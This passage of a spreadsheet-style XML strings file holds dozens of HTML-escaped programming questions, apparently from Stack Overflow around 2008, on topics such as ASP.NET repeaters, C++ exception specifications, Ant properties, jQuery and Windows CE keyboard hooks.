    <t xml:space="preserve">&lt;p&gt;Is it possible to get a list of all files modified/added/deleted by a particular user?&lt;/p&gt;
&lt;p&gt;The goal is to get an idea of what a user did for the day (or date range).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adjust Sharepoint URL field length</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway to change the length of the field that Sharepoint uses to store URLs. Its default is 255, which is just not long enough to hold links to content within the sharepoint site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using only std::exception in exception specification</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems it is general accepted that exception specifications are not helping as much as one thinks. But I wonder if a specification which only uses std::exception might be a good compromise:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void someFunction()
    throw ( std::exception );
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;It documents the fact that this method/function might throw an exception.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It would make sure that only exceptions derived from std::exception are thrown and not some exotic classes like std::string or int.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, would this be better then not having any specification at all?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Regarding the Runtime-Overhead: Think of it like the usage of asserts. You are using asserts regardless of the runtime-overhead, right? I know you usually can disable them for a release-build, so maybe a better approach would be to wrap the exception specification in a macro so you can disable it for a release build. Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#ifdef DEBUG
    #define THROW( exception ) throw ( exception )
#else
    #define THROW( exception )
#endif
void someFunction()
    THROW( std::exception );
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>UITextField in UITableViewCell's and proper usage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a complex settings style table where individual cells represent different aspects of a data model class. Users can click into a cell and edit individual attributes, such as say if I have a user class, a name, date of birth, etc. My question is, do I need to have an instance of UITextField for each unique cell? Can I just create one subclass of UITableViewCell, set up a delegate, and determine where it is from there?&lt;/p&gt;
&lt;p&gt;What's the best approach?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Variable/Ram viewer for .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Office Automation in .NET. It is leaving behind the excel.exe program. I know the fix - it is all about explicitely defining the variables. Once defined, I can properly de-allocate the ram and the GC will clean them up.&lt;/p&gt;
&lt;p&gt;The problem is, I have literally thousands of lines of code to go through. So I'm wondering: Is there some sort of a utility in .net (or 3rd party) that is capable of showing me a list of variables for which I have ram allocated still? If so, I would be able to target those items and specificially de-allocate them.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Ryan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use libapt (or libept) in debian-like system to list packages and get their infos?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Somebody used libapt or libept to list packages and get informations about package in a debian-like system?&lt;/p&gt;
&lt;p&gt;Libapt is not well-documented at all, and i've found few examples and tutorials about libept. Can someone explain me best methods to&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;get a list of every packages in the apt-system&lt;/li&gt;
&lt;li&gt;get informations about single packages (like name, version, dependences, description, etc.&lt;/li&gt;
&lt;li&gt;get list of files installed by a single package&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Work directly with apt internal files is quite simple, but i want to use a library to respect apt specifications.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Statistics engine for Java EE Web Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are working on a Java EE Web Application, and the people from marketing need some really detailed stats for our site. Something similar to Google Analytics, gathering the user's information, and their navigation through the site (where they come from, what they click, where they go, etc.).&lt;/p&gt;
&lt;p&gt;Depending on a third party service like Analytics is not an option.&lt;/p&gt;
&lt;p&gt;They would also like to get this information presented in graphs and stuff, which is not that hard since once the data is gathered, it's just about the right queries and the way we display it.&lt;/p&gt;
&lt;p&gt;Not wanting to re invent the wheel, do you know if there's any API, framework or other kind of libraries to add to the project for this goal?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>On Windows, when should you use the "\\\\?\\" filename prefix?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across a c library for opening files given a Unicode filename. Before opening the file, it first converts the filename to a path by prepending "\\?\". Is there any reason to do this other than to increase the maximum number of characters allowed in the path, per &lt;a href="http://msdn.microsoft.com/en-us/library/aa365247.aspx"&gt;this msdn article&lt;/a&gt;? &lt;/p&gt;
&lt;p&gt;It looks like these "\\?\" paths require the Unicode versions of the Windows API and standard library.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET 2.0 - Tokenizing space separated text</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose you have output like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Word1           Word2   Word3      Word4
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where the number of spaces between words is arbitrary. I want to break it into an array of words.&lt;/p&gt;
&lt;p&gt;I used the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string[] tokens =
         new List&amp;lt;String&amp;gt;(input.Split(' '))
             .FindAll
             (
                 delegate(string token)
                 {
                      return token != String.Empty;
                 }
             ).ToArray();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not exactly efficient, but does the job nicely.&lt;/p&gt;
&lt;p&gt;How would you do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I determine the element type of a matched element in jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm matching ASP.Net generated elements by ID name, but I have some elements which may render as text boxes or labels depending on the page context. I need to figure out whether the match is to a textbox or label in order to know whether to get the contents by val() or by html().&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("[id$=" + endOfIdToMatch + "]").each(function () {
    //determine whether $(this) is a textbox or label
    //do stuff
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I found a solution that doesn't work, it just returns "undefined":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("[id$=" + endOfIdToMatch + "]").each(function () {
    alert($(this).tagName);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing and Enforcing Coding Standards</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My team (of which I am the newest and most junior member) has increased in size from 3 to 9 developers in just about 1 year.  Our primary product has increased in complexity and we are about to undertake a year long port/re-write to Silverlight.  In the past there has been no specific style/standard enforced.&lt;/p&gt;
&lt;p&gt;I suggested to my boss that now would be a good time to implement such standards.  I passed on &lt;a href="http://idesign.net/idesign/DesktopDefault.aspx"&gt;IDesign's&lt;/a&gt; document to him and he likes the idea.  He has 2 concerns.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;This is a big document to absorb.  My thought here is to develop a slimmed down cheat-sheet for the most common items that we're likely to run into, with the understanding that the IDesign standard is the "Master" and anything not covered in the slimmed down version should be looked up in the "Master" document.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;What is the best way to enforce this.  It's not a question of trying to dictate; it's a matter of trying to get folks used to developing to a particular standard.  There are at least 2 folks on the team that have been developing to the current non-standard for several years now.  In order to address this concern, I'd like to see if there's a tool that can be configured to enforce these standards, or at a minimum warn of "violations" of the standard at either compile-time or design-time.  I found Microsoft'd StyleCop, but from what I've been able to determine, it isn't configurable and is set up to follow Microsoft's standard, which doesn't completely mesh with IDesign's. &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any input on tools or the approach I'm looking at would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Buttons in gridview control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a gridview control which displays data returned from DB. The datakey property of the gridview is bound to the ID column of the DB&lt;/p&gt;
&lt;p&gt;Each record in the GV had 2 buttons and one Checkbox. When either of these controls is clicked I want to obtain the row that this was clicked on and perform action depending on which control was clicked.&lt;/p&gt;
&lt;p&gt;I was hoping I could use the &lt;code&gt;row_command&lt;/code&gt; event to capture which control was clicked but that did not do the trick unless i am missing something&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read &amp; Update filestream</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a little utility that does a search of a number of files. I had to create it because both Google &amp;amp; Windows desktop searches were not finding the appropriate lines in files. The searching works fine (I am willing to improve on it) but one of the things I would like to add to my util is a batch find/replace.&lt;/p&gt;
&lt;p&gt;So how would be the best way to read a line from a file, compare it to a search term and if it passes, then update the line, and continue through the rest of the file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why would Guid.NewGuid() be generating an empty guid?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Guid.NewGuid() call that is creating an Empty Guid.  &lt;/p&gt;
&lt;p&gt;What would cause such a problem and how can I fix it?&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Edit:&lt;/b&gt; The code:&lt;br /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;WebMethod()&amp;gt; _
Public Function CreateRow(rowValue As String) as String
    Dim rowPointer As Guid = System.Guid.NewGuid()
    Dim rowPointerValue As String = rowPointer.ToString()
    Try
        Dim result as Integer = SqlHelper.ExecuteNonQuery(ConnectionString, "Sproc_Name", rowValue, rowPointer)
        Return result
    Catch ex as Exception
        Throw ex
    End Try
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Turns out that rowPointer was originally being passed to the SqlHelper and not rowPointerValue - This of course is passed as empty, as pointed out in the answers.  Changing it to rowPointerValue/rowPointer.ToString() fixed the problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I feed standard input to a batch file when an app run from the batch mucks with stdin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's a minimal batch file, &lt;code&gt;demo.bat&lt;/code&gt;, to illustrate my problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@ECHO off
set /p foo=Enter foo:
echo.
echo you typed "%foo%"
sqlcmd -?
set /p bar=Enter bar:
echo.
echo you typed "%bar%"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have an input file &lt;code&gt;foo.txt&lt;/code&gt; that looks like so:&lt;/p&gt;
&lt;pre&gt;
foo_value
bar_value
&lt;/pre&gt;
&lt;p&gt;I run my batch file as &lt;code&gt;demo.bat &amp;lt; foo.txt&lt;/code&gt;.  The output is:&lt;/p&gt;
&lt;pre&gt;
Enter foo:
you typed "foo_value"
Microsoft (R) SQL Server Command Line Tool
Version 9.00.3042.00 NT INTEL X86
Copyright (c) Microsoft Corporation.  All rights reserved.
usage: Sqlcmd            [-U login id]          [-P password]
  (...etc...)
Enter bar:
you typed "foo_value"
&lt;/pre&gt;
&lt;p&gt;If I remove the &lt;code&gt;sqlcmd -?&lt;/code&gt;, then bar is "typed" as &lt;code&gt;bar_value&lt;/code&gt;, which is what I originally expected.&lt;/p&gt;
&lt;p&gt;So, it looks to me like &lt;code&gt;sqlcmd&lt;/code&gt; is not playing nice somehow with the standard input that wasn't meant for it.  Anyone have
any bright ideas on how I can work around it?  In a perfect world, the solution would not involve changing the original
batch file, or involve installing third-party packages to drive the interaction (e.g. Expect).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use System::Threading::Interlocked::Increment on a static variable from C++/CLI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to keep a static counter in a garbage collected class and increment it using Interlocked::Increment.  What's the C++/CLI syntax to do this?&lt;/p&gt;
&lt;p&gt;I've been trying variations on the following, but no luck so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ref class Foo
{
   static __int64 _counter;
   __int64 Next()
   {
      return System::Threading::Interlocked::Increment( &amp;amp;_counter );
   }
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>read property value in Ant</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to read the value of a property from a file in an Ant script and strip off the first few characters. The property in question is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;path=file:C:/tmp/templates
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This property is store in a file that I can access within the ant script via&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;property file="${web.inf.dir}/config.properties"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have two questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;How do I read the single 'path' property from the loaded property file?&lt;/li&gt;
&lt;li&gt;How do I remove the leading 'file:' from the property value?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ultimately, I'd like to have access to the following name-value pair within the Ant script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;path=C:/tmp/templates
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Cheers,
Don&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating a Protocol Buffers definition</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large set of XML files of a propriatary schema -the XML files define binary communication protocol (message structure).&lt;/p&gt;
&lt;p&gt;I'd like to leverage Google's protocol buffers technology. &lt;/p&gt;
&lt;p&gt;I am using existing code to load the XML files into an object model (in memory). 
I'd like to generate a .proto file from that object model. &lt;/p&gt;
&lt;p&gt;so basically what I am looking for is code/library (in C#/.NET) that represents the .proto file format as an object model and can save that object model into a .proto file.&lt;/p&gt;
&lt;p&gt;I took a look at Jon Skeet's dotnet-protobufs, I think I understand what it does (generate c# code based on .proto files) &lt;/p&gt;
&lt;p&gt;However, I didn't figure out if I can use it for my project (it probably has the .proto format object model there, but probably only code that can parse this format and not write it out)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>tool for detecting non-parametrized sql in java jdbc code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to inspect SQL statements in Java/jdbc code to ensure that the SQL to be executed is of acceptable quality. Neither PMD not Findbugs appears to have JDBC or sql rules. I could use p6spy to log the SQL and look at  that way, but this is manual. &lt;/p&gt;
&lt;p&gt;I'm wondering if the strategy of of using PMD/Findbugs/etc to create a rule that any string passed to PreparedStatement where there is an "=" or "in" has only parametrized vars on the compare side.&lt;/p&gt;
&lt;p&gt;Has anyone done this? Or done this by other means?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enable/Disable buttons depending on the app selected control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very complicated .NET application that contains cut/copy/paste functionality. I want to enable/disable cut/copy/paste buttons depending on the selected control/content. The app has many user controls. What is the best way to achieve this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: How to change the itemTemplate used per row in an &lt;asp:repeater&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;em&gt;Existing&lt;/em&gt; code is using an &lt;code&gt;asp:repeater&lt;/code&gt; to build an HTML table. (emphasis on the existing design). This is some partial pseudo-code to generate the table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:repeater OnItemDataBound="ItemDataBound" ... &amp;gt;
   &amp;lt;headertemplate&amp;gt;
      &amp;lt;table&amp;gt;
         &amp;lt;thead&amp;gt;
            &amp;lt;tr&amp;gt;
               &amp;lt;td&amp;gt;Date&amp;lt;/td&amp;gt;
               &amp;lt;td&amp;gt;Type&amp;lt;/td&amp;gt;
               &amp;lt;td&amp;gt;Action&amp;lt;/td&amp;gt;
            &amp;lt;/tr&amp;gt;
         &amp;lt;/thread&amp;gt;
   &amp;lt;/headertemplate&amp;gt;
   &amp;lt;itemtemplate&amp;gt;
      &amp;lt;tr&amp;gt;
         &amp;lt;td&amp;gt;&amp;lt;%# GetTextForThis((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
         &amp;lt;td&amp;gt;&amp;lt;%# GetTextForThat((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
         &amp;lt;td&amp;gt;&amp;lt;%# GetTextForTheOther((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;/tr&amp;gt;
   &amp;lt;/itemtemplate&amp;gt;
   &amp;lt;footertemplate&amp;gt;
         &amp;lt;/tbody&amp;gt;
      &amp;lt;/table&amp;gt;
   &amp;lt;/footertemplate&amp;gt;
&amp;lt;/asp:repeater&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But now it is needed that (some) items display differently, and it is needed that it is done using a &lt;code&gt;COLSPAN=3&lt;/code&gt;, and the entire item will be one cell:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   &amp;lt;itemtemplate&amp;gt;
      &amp;lt;tr&amp;gt;
         &amp;lt;td colspan="3"&amp;gt;
            &amp;lt;img src="&amp;lt;%# GetImageSrcForFoo((MyItem)Container.DataItem) %&amp;gt;
            &amp;lt;a href="&amp;lt;%# GetHrefForFoo((MyItem)Container.DataItem) %&amp;gt;
         &amp;lt;/td&amp;gt;
      &amp;lt;/tr&amp;gt;
   &amp;lt;/itemtemplate&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Given:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the page uses a repeater to build an HTML table&lt;/li&gt;
&lt;li&gt;the design requires some table rows to span columns&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How can i do this?&lt;/p&gt;
&lt;p&gt;i was &lt;strong&gt;hoping&lt;/strong&gt; for something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   &amp;lt;itemtemplate id="thisThatTheOtherItemTemplate"&amp;gt;
      &amp;lt;tr&amp;gt;
         &amp;lt;td&amp;gt;&amp;lt;%# GetTextForThis((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
         &amp;lt;td&amp;gt;&amp;lt;%# GetTextForThat((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
         &amp;lt;td&amp;gt;&amp;lt;%# GetTextForTheOther((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;/tr&amp;gt;
   &amp;lt;/itemtemplate&amp;gt;
   &amp;lt;itemtemplate id="fooItemTemplate"&amp;gt;
      &amp;lt;tr&amp;gt;
         &amp;lt;td colspan="3"&amp;gt;
            &amp;lt;img src="&amp;lt;%# GetImageSrcForFoo((MyItem)Container.DataItem) %&amp;gt;
            &amp;lt;a href="&amp;lt;%# GetHrefForFoo((MyItem)Container.DataItem) %&amp;gt;
         &amp;lt;/td&amp;gt;
      &amp;lt;/tr&amp;gt;
   &amp;lt;/itemtemplate&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and somehow magically be able to have the OnDataBind event tell the repeater which template to use. Is this possble?&lt;/p&gt;
&lt;h2&gt;Answer&lt;/h2&gt;
&lt;p&gt;Although both answers are right and good, i'd rather use the first suggestion; which involves having display code in the aspx file, rather than building HTML manually in a code-behind. (i don't want to ever have to build HTML in code again)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   &amp;lt;itemtemplate&amp;gt;
      &amp;lt;asp:PlaceHolder ID="thing1" runat="server"&amp;gt;
         &amp;lt;tr&amp;gt;
            &amp;lt;td&amp;gt;&amp;lt;%# GetTextForThis((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
            &amp;lt;td&amp;gt;&amp;lt;%# GetTextForThat((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
            &amp;lt;td&amp;gt;&amp;lt;%# GetTextForTheOther((MyItem)Container.DataItem) %&amp;gt;&amp;lt;/td&amp;gt;
         &amp;lt;/tr&amp;gt;
      &amp;lt;/asp:PlaceHolder&amp;gt;
      &amp;lt;asp:PlaceHolder ID="thing2" visible="false" runat="server"&amp;gt;
         &amp;lt;tr&amp;gt;
            &amp;lt;td colspan="3"&amp;gt;
               &amp;lt;img src="&amp;lt;%# GetImageSrcForFoo((MyItem)Container.DataItem) %&amp;gt;
               &amp;lt;a href="&amp;lt;%# GetHrefForFoo((MyItem)Container.DataItem) %&amp;gt;
            &amp;lt;/td&amp;gt;
         &amp;lt;/tr&amp;gt;
   &amp;lt;/itemtemplate&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and in the code-behind:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void myRepeater_ItemDataBound(object sender, RepeaterItemEventArgs e)
{
   // if the data bound item is an item or alternating item (not the header etc)
   if (e.Item.ItemType == ListItemType.Item || e.Item.ItemType == ListItemType.AlternatingItem)
   {
      // get the associated object
      Object item = .Item.DataItem;
      if (item == null)
         return;
      Control thing1 = e.Item.FindControl("thing1");
      Control thing2 = e.Item.FindControl("thing2");
      if (item is MyClassThatICreated)
      {
         thing1.Visible = false;
         thing2.Visible = true;
      }
      else
      {
         thing1.Visible = true;
         thing2.Visible = false;
      }
      ...
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Shorten URL value as Javascript variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the &lt;a href="http://jquery.com/" rel="nofollow"&gt;jQuery&lt;/a&gt; &lt;a href="http://bassistance.de/jquery-plugins/jquery-plugin-treeview/" rel="nofollow"&gt;Treeview&lt;/a&gt; plugin for navigation on a site with nested levels of categories. In each category there are then products, each of which have one or more information types.&lt;/p&gt;
&lt;p&gt;So my URLs can be either:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;foo.com/view/cat_id/&lt;/li&gt;
&lt;li&gt;foo.com/view/cat_id/prod_id/&lt;/li&gt;
&lt;li&gt;foo.com/view/cat_id/prod_id/info_id/&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Trouble is, the navigation for the products is separate to the categories, which means Treeview only 'knows about' (and therefore marks 'active') case 1. Cases 2 &amp;amp; 3 mean that the tree is collapsed, whereas I want the tree to be open to cat_id for all cases.&lt;/p&gt;
&lt;p&gt;(I'm open to anything, but) I'm thinking the solution is some Javascript trickery to remove anything after cat_id/ from the URL so that I can then pass the result to Treeview, but not being that au fait with Javascript I can't figure out how to do it.&lt;/p&gt;
&lt;p&gt;Note: I'm looking for help with the Javascript regex, not Treeview, though on the off-chance that anyone knows of a ready-rolled solution I am of course all ears.&lt;/p&gt;
&lt;p&gt;TIA.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In .NET CF 2.0, will a global keyboard hook interfere with P/Invokes that require a keypress?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My details: custom mobile device running Windows CE 4.2, Compact Framework 2.0 SP1. C# app making decent use of P/Invokes with no problems until now.&lt;/p&gt;
&lt;p&gt;I've written a low-level keyboard hook (similar to, but not identical to, &lt;a href="https://secure.codeproject.com/KB/cs/CSLLKeyboardHook.aspx?display=PrintAll&amp;amp;fid=423705&amp;amp;df=90&amp;amp;mpp=25&amp;amp;noise=3&amp;amp;sort=Position&amp;amp;view=Quick&amp;amp;select=2068536&amp;amp;fr=26" rel="nofollow"&gt;this CodeProject post&lt;/a&gt;) which works marvelously with one exception. One thing that our software does is allow access to Windows CE's screen-calibration functionality; this is the screen upon which you need to tap a series of targets, finally pressing Esc to cancel or Enter to accept. We call this functionality &lt;a href="http://msdn.microsoft.com/en-us/library/aa908613.aspx" rel="nofollow"&gt;via a P/Invoke&lt;/a&gt;, and I think the keypress that occurs inside this Win32 API function is being interfered with by my keyboard hook. &lt;/p&gt;
&lt;p&gt;My keyboard hook doesn't do anything intensive, and doesn't change execution flow, but I think the use of the two may be fundamentally incompatible. When I exit the debugger after running this screen, all the Enter key presses I've attempted all "hit" at once (this device makes a clicky typing noise) when the program closes. This makes me think that the hook is not properly passing the keypress into the Win32 API function the way it correctly does to a .NET application. Any thoughts?&lt;/p&gt;
&lt;p&gt;Do you think that:&lt;br /&gt;
a) Keyboard hooks and keyboard-requiring P/Invokes are incompatible, or&lt;br /&gt;
b) my implementation of the keyboard hook is to blame, or&lt;br /&gt;
c) does it depend at all on the hardware manufacturer, drivers, etc?&lt;/p&gt;
&lt;p&gt;Thanks for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight Verticle Slide Panel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a good Silverlight 2.0 slide panel that takes an unknown number of user controls as childen and allows the user to scroll up and down through the child list.&lt;/p&gt;
&lt;p&gt;Similar to &lt;a href="http://www.thejamesbondmovies.com/" rel="nofollow"&gt;http://www.thejamesbondmovies.com/&lt;/a&gt; but vertical and not just limited to images.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Replace MS Cardspace UI</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to replace Microsoft Cardspace UI with your own? Or use Cardspace without any UI?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sorting domain names</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone implemented sorting a list of domain names?&lt;/p&gt;
&lt;p&gt;I have seen some applications sort them as flat strings, but the problem is that you end up scattering all the related hosts in a domain:&lt;/p&gt;
&lt;p&gt;a.me.com
a.you.com
b.me.com
b.you.com&lt;/p&gt;
&lt;p&gt;So, the basic logic I came up with reverse the order of the labels, then sort.&lt;/p&gt;
&lt;p&gt;FQDNs of one label should be treated as hostnames, and probably sorted separately, maybe at the top.&lt;/p&gt;
&lt;p&gt;Ideally I am looking for javascript and java versions.&lt;/p&gt;
&lt;p&gt;I also don't know if this design works well for the newer internationalized domain names.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the instance of a templated item from a databound ItemsControl? (WPF)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an &lt;code&gt;&amp;lt;ItemsControl&amp;gt;&lt;/code&gt; with a custom &lt;code&gt;&amp;lt;DataTemplate&amp;gt;&lt;/code&gt; (and also a custom &lt;code&gt;&amp;lt;ItemsPanelTemplate&amp;gt;&lt;/code&gt; that is just a &lt;code&gt;WrapPanel&lt;/code&gt;), bound via &lt;code&gt;ItemsSource&lt;/code&gt; to a simple observable collection of strings.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;DataTemplate&lt;/code&gt; consists simply of an instance of a custom &lt;code&gt;UserControl&lt;/code&gt; whose properties are bound to the string via &lt;code&gt;{Binding}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The problem is since my data items are just strings, I need to access the instances of my &lt;code&gt;UserControl&lt;/code&gt; directly programmatically, but I can't seem to figure out how!&lt;/p&gt;
&lt;p&gt;I've tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var item = tagBar.Items[ tagBar.Items.Count - 1 ];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...but that just returns the string. Also:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var item2 = tagBar.ItemContainerGenerator.ContainerFromIndex( tagBar.Items.Count - 1 );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...returns a &lt;code&gt;ContentPresenter&lt;/code&gt;, and I can't figure out what to do with the &lt;code&gt;ContentPresenter&lt;/code&gt; to get to the instance of my &lt;code&gt;UserControl&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;??&lt;/p&gt;
&lt;p&gt;This is similar to &lt;a href="http://stackoverflow.com/questions/283943/find-ui-element-corresponding-to-an-item-in-a-silverlight-itemscontrol"&gt;this question&lt;/a&gt;, but it was never properly answered, and was also specific to Silverlight whereas this is WPF.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Application crashes on iPhone OS 2.2, works fine on 2.1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is the trace of my app,when I updated my device to 2.2.&lt;/p&gt;
&lt;p&gt;any idea to get rid of this leak? because I think that's the culprit who keep crashing my application.&lt;br /&gt;
This is trace when I run my application in os2.2,see the image which show the part which might be generating leak,and if you can give me some hints to resolve it, will be greatly appreciated.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://origindata.wapfly.com.au/extra/Picture%204.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://origindata.wapfly.com.au/extra/Picture%203.png" alt="alt text" /&gt;
This is trace when I run my application in os2.1.it's very wired issue.
&lt;img src="http://origindata.wapfly.com.au/extra/Picture%205.png" alt="alt text" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create Java console inside a GUI panel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create an instance of the Java console inside of a GUI panel?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get .NET version (1.1, 2.0, 3.0 etc.) under which an Assembly was built?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an assembly. Is there a way to detect which version of .NET was used to build that assembly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can MVC (or MVP) co-exist with SOA?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think that business logic should exist in a model when using an MVC or MVP design pattern, but should be hidden behind a service in a service-oriented architecture.&lt;/p&gt;
&lt;p&gt;Can a software system use the MVC or MVP design pattern within a service-oriented architecture? If so, where does the model sit?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extract Icon from Windows .lnk (shortcut) file</t>
  </si>
  <si>
